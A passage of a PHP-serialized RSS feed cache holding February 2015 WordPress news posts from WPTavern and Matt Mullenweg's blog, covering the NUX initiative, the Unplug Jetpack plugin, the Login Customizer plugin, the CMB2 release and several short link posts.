4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38655\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/initiative-aims-to-improve-the-new-user-experience-in-wordpress-4-2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4889:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/NewUserExperienceFeaturedImage.png\" rel=\"prettyphoto[38655]\"><img class=\"size-full wp-image-38713\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/NewUserExperienceFeaturedImage.png?resize=650%2C200\" alt=\"New User Experience Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/35034347371@N01/414920055\">zu.com – Image136</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the release cycle</a> for WordPress 4.2 <a title=\"https://make.wordpress.org/core/2015/02/05/4-2-community-initiative-nux-working-group/\" href=\"https://make.wordpress.org/core/2015/02/05/4-2-community-initiative-nux-working-group/\">announced on the Make.WordPress.core blog,</a> that a new community initiative has been launched called NUX or New User Experience. The group is made up of more than 15 members of the WordPress community who have experience in onboarding clients, training clients, and work with new users on a regular basis. According to the announcement, the group’s main task is as follows:</p>\n<blockquote><p>The group will be tasked with helping to identify common pain points new users might experience using WordPress. The hope is to (re)invigorate the conversation about making NUX a priority in core decision-making. We’ll work together to identify problems and recommend solutions.</p></blockquote>\n<p>With regards to 4.2, the group will brainstorm actionable goals and make recommendations to improve the new user experience throughout the WordPress backend. Jaynes says, “These changes would likely include improvements to contextual help on various screens, improvements to the content of the Welcome Panel, as well as adjustments to many other established workflows in core interfaces including the installation process.”</p>\n<p>Recommendations large and small will receive direct feedback from core developers. This provides an opportunity for new users to immediately contribute back to WordPress. The group’s first meeting will be held <a href=\"http://www.timeanddate.com/worldclock/fixedtime.html?iso=20150210T1900\"><abbr class=\"date\" title=\"2015-02-10T19:00:00+00:00\">Tuesday, February 10, 2015 14:00 UTC-5</abbr></a> in the <a href=\"https://wordpress.slack.com/messages/core-flow/\">#core-flow</a> channel on <a href=\"https://make.wordpress.org/chat\">Slack</a>.</p>\n<h2>Re-establishing Easy as a Selling Point</h2>\n<p>I’ve used WordPress since 2008 and one of its strongest selling points has always been that it’s easy to use. However, as WordPress has advanced, I think it’s become progressively more difficult to use. Within the last two years, several articles have highlighted the increasing difficulty in using and explaining WordPress.</p>\n<ul>\n<li><a title=\"http://mor10.com/wordpress-easy-thats-ok/\" href=\"http://mor10.com/wordpress-easy-thats-ok/\">WordPress is not easy – and that’s OK</a></li>\n<li><a title=\"https://medium.com/@salliegoetsch/have-we-been-misleading-people-about-wordpress-9dcd7dbf3034\" href=\"https://medium.com/@salliegoetsch/have-we-been-misleading-people-about-wordpress-9dcd7dbf3034\">Have We Been Misleading People about WordPress?</a></li>\n<li><a title=\"http://wptavern.com/why-is-explaining-wordpress-to-someone-so-hard\" href=\"http://wptavern.com/why-is-explaining-wordpress-to-someone-so-hard\">Why Is Explaining WordPress To Someone So Hard?</a></li>\n</ul>\n<p>I think a good base to start from to improve the user experience is Jen Mylo’s <a title=\"http://jenmylo.com/2014/10/05/site-setup-journal-prologue/\" href=\"http://jenmylo.com/2014/10/05/site-setup-journal-prologue/\">site setup journal experiment</a>. In the series, Mylo documents what it’s like as a new user to install WordPress on a host, setup a website, and browse through documentation. <a title=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-i/\" href=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-i/\">Part 1</a> covers domains and hosting while <a title=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-ii/\" href=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-ii/\">part 2</a> is about setting up WordPress. Her journey is an eye-opening experience and shows how many areas of WordPress are ripe for improvement.</p>\n<p>If WordPress is going to achieve <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\">50% market share</a>, it needs to be easy to install and use. The New User Experience initiative is a good step towards ensuring the future of WordPress adoption.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 19:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Matt: Fusion.net\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44663\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://ma.tt/2015/02/fusion-net/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:347:\"<p>There’s <a href=\"http://fusion.net/\">a relatively new site called Fusion.net that is definitely worth checking out</a>, it’s already full of great articles and they’re <a href=\"http://techmeme.com/lb\">starting to climb up the Techmeme Leaderboard</a>. They run on <a href=\"http://vip.wordpress.com/\">WordPress.com VIP</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 18:30:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: Unplug Jetpack: Use Jetpack Modules Without Connecting to WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38723\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://wptavern.com/unplug-jetpack-use-jetpack-modules-without-connecting-to-wordpress-com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2837:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/unplug.jpg\" rel=\"prettyphoto[38723]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/unplug.jpg?resize=1024%2C510\" alt=\"photo credit: Unplugged - (license)\" class=\"size-full wp-image-38734\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/23307937@N04/3415991748\">Unplugged</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Connecting a WordPress.com account in order to use Jetpack can be a hassle, especially when developing for clients or working on your local machine. If you like Jetpack but don’t want to connect to WordPress.com, there’s a new plugin that makes it easy to use the features that don’t require a connection.</p>\n<p><a href=\"https://wordpress.org/plugins/unplug-jetpack/\" target=\"_blank\">Unplug Jetpack</a> was created by WordPress developer <a href=\"http://tannermoushey.com/\" target=\"_blank\">Tanner Moushey</a>. With the plugin activated, you won’t be required to connect to WordPress.com unless you need to use Site stats, Publicize, Related Posts, etc. If you don’t see the module you’re looking for among the others, that means that it likely requires a WordPress.com connection in order to use it.</p>\n<p>The Unplug Jetpack plugin essentially puts Jetpack into development mode. Development mode was introduced in Jetpack <a href=\"http://jetpack.me/2013/03/28/jetpack-dev-mode-release/\" target=\"_blank\">2.2.1</a> to help developers with local testing. It allows you to use features that do not require a connection to WordPress.com servers. Ordinarily, turning on development mode requires adding a line to your wp-config.php file or employing the filter via a plugin.</p>\n<p>Unplug Jetpack is convenient, because it allows you to turn development mode on/off using a plugin. It uses the Jetpack-supported method for doing this and consists of just a couple lines of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\nfunction uj_init() {\n add_filter( \'jetpack_development_mode\', \'__return_true\' );\n}\nadd_action( \'plugins_loaded\', \'uj_init\' );\n</pre>\n<p>When asked whether or not the plugin offers a performance boost as opposed to using non-WordPress.com dependent modules with the connection to WordPress.com, Moushey <a href=\"https://twitter.com/tannermoushey/status/564189285071351808\" target=\"_blank\">said</a> that it’s unlikely to have a significant performance impact. “But that is not really the point of this,” he said. It’s the principle of the matter – being able to use Jetpack’s code without the requirement of connecting to a third party. <a href=\"https://wordpress.org/plugins/unplug-jetpack/\" target=\"_blank\">Unplug Jetpack</a> lets you do that with the flip of a switch.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 18:22:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"Matt: What is a Hacker?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44661\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/what-is-a-hacker/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"<p>Steven Levy asks <a href=\"https://medium.com/backchannel/what-is-a-hacker-51257cad8b54\">What is a Hacker? and gets some great answers back</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 01:08:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Matt: Productivity of Working from Home\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://ma.tt/2015/02/productivity-of-working-from-home/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:270:\"<p>FiveThirtyEight says <a href=\"http://fivethirtyeight.com/datalab/people-working-from-home-in-a-snowstorm-may-be-producing-more-than-you-are/\">People Working From Home In A Snowstorm May Be Producing More Than You Are</a>, on the productivity of working from home.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Feb 2015 03:41:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Tom Ford’s 15 Things\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44642\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/02/tom-fords-15-things/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1195:\"<p>For the <a href=\"http://www.vogue.co.uk/spy/15th-anniversary\">15th anniversary of Vogue.com</a> noted fashion designer Tom Ford made a list of 15 things that every man should have, which are as follow:</p>\n<ol>\n<li>A sense of humour.</li>\n<li>A daily read of a newspaper.</li>\n<li>A sport that you love and are good at.</li>\n<li>Tweezers.</li>\n<li>A good cologne that becomes a signature.</li>\n<li>A well cut dark suit.</li>\n<li>A pair of classic black lace up shoes.</li>\n<li>A smart blazer.</li>\n<li>The perfect pair of dark denim jeans.</li>\n<li>Lots of crisp white cotton shirts.</li>\n<li>Always new socks and underwear, throw away the old ones every 6 months.</li>\n<li>A classic tuxedo.</li>\n<li>A beautiful day watch with a metal band.</li>\n<li>The perfect sunglasses.</li>\n<li>Perfect teeth. If you don’t have them, save up and get them fixed.</li>\n</ol>\n<p>A pretty good list, though I would <a href=\"http://cir.ca/\">replace the newspaper with Circa</a>, and I must confess I’m not sure sure what #4 the tweezers are for.</p>\n<p><a href=\"http://om.co/2011/07/05/tom-ford-5-tips-to-be-a-modern-gentleman/\">Om also has Tom Ford’s 5 tips for a modern gentleman</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 23:49:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Customize Your Login Page Using the WordPress Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38581\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/customize-your-login-page-using-the-wordpress-customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2713:\"<p>As a result of the improvements to the Customizer API in WordPress 4.0 and 4.1, developers now have access to a wider array of controls and parameters that allow them to extend the feature for more varied uses beyond themes. The new <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Custom Login Customizer</a> plugin is a prime example of making the customizer available outside of a theme-related context.</p>\n<p>The plugin adds its own panel to the customizer with a myriad of options for customizing the design of your site’s login page.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg\" rel=\"prettyphoto[38581]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg?resize=987%2C572\" alt=\"login-customizer\" class=\"aligncenter size-full wp-image-38688\" /></a></p>\n<p>Custom Login Customizer allows you to customize nearly every aspect of the login form, including the following:</p>\n<ul>\n<li>Set a login logo, along with width, height, and padding</li>\n<li>Add a background, select background color and size</li>\n<li>Set a background for the form</li>\n<li>Adjust form styling – width, height, padding, border</li>\n<li>Style input field width, margin, background, and input/label colors</li>\n<li>Color picker for button background, border, hover background/border, button box shadow</li>\n<li>Select text colors</li>\n<li>Add custom CSS</li>\n</ul>\n<p>I tested the plugin and found it works smoothly as advertised. Once installed, navigate to Appearance > Login Customizer in order to launch your login page in the customizer while still being logged in.</p>\n<p>Custom Login Customizer was created by WordPress developer <a href=\"http://www.hardeepasrani.com/\" target=\"_blank\">Hardeep Asrani</a> and then sold to <a href=\"https://themeisle.com/\" target=\"_blank\">ThemeIsle.com</a> last week. “I believe Themeisle will most probably have a premium version with some more features in the future,” Asrani said. “However, the free plugin will still be there at the WordPerss.org repository and will have more features soon. At this moment, there’s no premium version or a plan for it.”</p>\n<p>There are many plugins out there which allow you to customize your login page. However, the advantage of using this particular one is that you can preview your changes live before saving them. This is one of the best uses of the customizer in a plugin that I have seen so far. It makes designing your login page an easy and enjoyable experience. Download the <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Login Customizer</a> from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 22:44:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Custom Metaboxes and Fields for WordPress (CMB2) Now Out of Beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38417\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/custom-metaboxes-and-fields-for-wordpress-cmb2-now-out-of-beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4291:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg\" rel=\"prettyphoto[38417]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg?resize=768%2C372\" alt=\"photo credit: Different types of wand cases stacked - (license)\" class=\"size-full wp-image-38683\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/22464562@N00/8084402724\">Different types of wand cases stacked</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The <a href=\"https://github.com/WebDevStudios/CMB2\" target=\"_blank\">Custom Metaboxes and Fields for WordPress (CMB2)</a> plugin is now officially out of beta and ready for public use. The tool was created to make it easy for developers to create metaboxes and forms with custom fields. Developers at <a href=\"http://webdevstudios.com/\" target=\"_blank\">WebDevStudios</a> took over the <a href=\"https://github.com/WebDevStudios/Custom-Metaboxes-and-Fields-for-WordPress\" target=\"_blank\">original CMB GitHub repository</a> from Jared Atchison, its original creator, in December of 2013.</p>\n<p>Justin Sternberg <a href=\"http://webdevstudios.com/2015/02/02/cmb2-wordpress-plugin/\" target=\"_blank\">explained</a> why WebDevStudios chose to start contributing to the CMB2 project:</p>\n<blockquote><p>After having been burned by some issues with other custom field plugins, we determined it was best to stick with code that we had some control over. We fell in love with CMB because it was a library we could include in any of our projects and it would just work while letting us keep all of the field configuration in the code, and more importantly, in our version control system.</p></blockquote>\n<p>Due to irreconcilable shortcomings in the original CMB, WebDevStudios opted to fork the project and create a new one that wouldn’t have the same backwards compatibility requirements. If you used CMB in the past, it’s important to note that the new CMB2 project has renamed every class, function, hook, and filter in the library to avoid conflicts with the original. It’s essentially a complete re-write.</p>\n<p>“CMB2 was built with a new mechanism to ensure it only loads the most recent version of CMB2 in your system,” Sternberg said. “This ensures that a plugin with an old bundled version will not conflict or take precedence over your up-to-date version.”</p>\n<p>The new <a href=\"https://wordpress.org/plugins/cmb2/\" target=\"_blank\">CMB2 is now available on WordPress.org</a> as a plugin for easy activation when you want to use it with one of your projects. As an alternative, you can <a href=\"https://github.com/WebDevStudios/CMB2/blob/master/example-functions.php#L14\" target=\"_blank\">include CMB2 directly</a>. The newly released plugin features the following:</p>\n<ul>\n<li>Create metaboxes to be used on post edit screens.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Using-CMB-to-create-an-Admin-Theme-Options-Page\" target=\"_blank\">Create forms to be used on an options pages.</a></li>\n<li>Create forms to handle user meta and display them on user profile add/edit pages.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Bringing-Metaboxes-to-the-Front-end\" target=\"_blank\">Flexible API that allows you to use CMB forms almost anywhere, even on the front-end</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Field-Types#types\" target=\"_blank\">30+ built-in field types</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Adding-your-own-field-types\" target=\"_blank\">Custom API hook that allows you to create your own field types</a></li>\n<li>Numerous hooks and filters, allowing you to modify many aspects of the library (without editing it directly)</li>\n<li>Repeatable fields for most field types are supported, as well as repeatable field groups</li>\n</ul>\n<p>The WebDevStudios team plans to maintain strict backwards compatibility moving forward, as of CMB2’s 2.0.1 release on WordPress.org. If you want to include CMB2 as part of your next project, make sure to check out the plugin’s <a href=\"https://github.com/WebDevStudios/CMB2/wiki\" target=\"_blank\">wiki and code library</a> for tips on how to add metaboxes, fields, and forms to WordPress themes and plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 21:05:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Harmonic: A Bold Free WordPress Theme for Artists and 